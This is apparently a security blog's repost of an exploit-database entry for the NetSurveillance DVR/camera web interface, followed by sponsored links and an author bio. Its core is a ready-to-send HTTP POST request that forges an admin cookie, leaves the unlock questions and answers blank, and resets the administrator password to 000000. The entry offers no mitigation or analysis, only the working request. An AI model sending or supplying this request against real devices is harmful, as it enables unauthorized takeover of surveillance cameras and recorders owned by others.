Tuesday, November 5, 2024

Netsuveillancewebcookie Web interface password change

# Exploit Title: NetSurveillance Web interface password change
# Exploit Author: AsCiI
# Vendor Homepage: 
# Software Link: 
# Version: V4.02.R11.00000140.10001.131900.00000 maybe other
# Tested on: V4.02.R11.00000140.10001.131900.00000 Build 
# CVE : 
 
NetSurveillance Web interface password can be changed when 
there is no default question set, the answer will be empty
Tested on System: V4.02.R11.00000140.10001.131900.00000

 
 
POST /result.html?cLanguage=null HTTP/1.1
Host: [Host_Name]
Referer: http://[Host_Name]/reminder.html
Content-Type: application/x-www-form-urlencoded
Cookie: NetSuveillanceWebCookie=%7B%22username%22%3A%22admin%22%7D
Unlockquestion1=Please+select+Question&Unlockanswer1=&Unlockquestion2=Please+select+Question&Unlockanswer2=&password=000000&confirpossword=000000
 
Bookmark
Please login to bookmarkClose
Share the word, let's increase Cybersecurity Awareness as we know it
Recommended:  CSRF flaw in csurf NPM package aimed at protecting against the same flaws
- Sponsored -

Sponsored Offer

Unleash the Power of the Cloud: Grab $200 Credit for 60 Days on DigitalOcean!

Digital ocean free 200

Discover more infosec

Steven Black (n0tst3)
Hello! I'm Steve, an independent security researcher, and analyst from Scotland, UK. I've had an avid interest in Computers, Technology and Security since my early teens. 20 years on, and, it's a whole lot more complicated... I've assisted Governments, Individuals and Organizations throughout the world. Including; US DOJ, NHS UK, GOV UK. I'll often reblog infosec-related articles that I find interesting. On the RiSec website, You'll also find a variety of write-ups, tutorials and much more!

more infosec reads

Subscribe for weekly updates

explore

more

security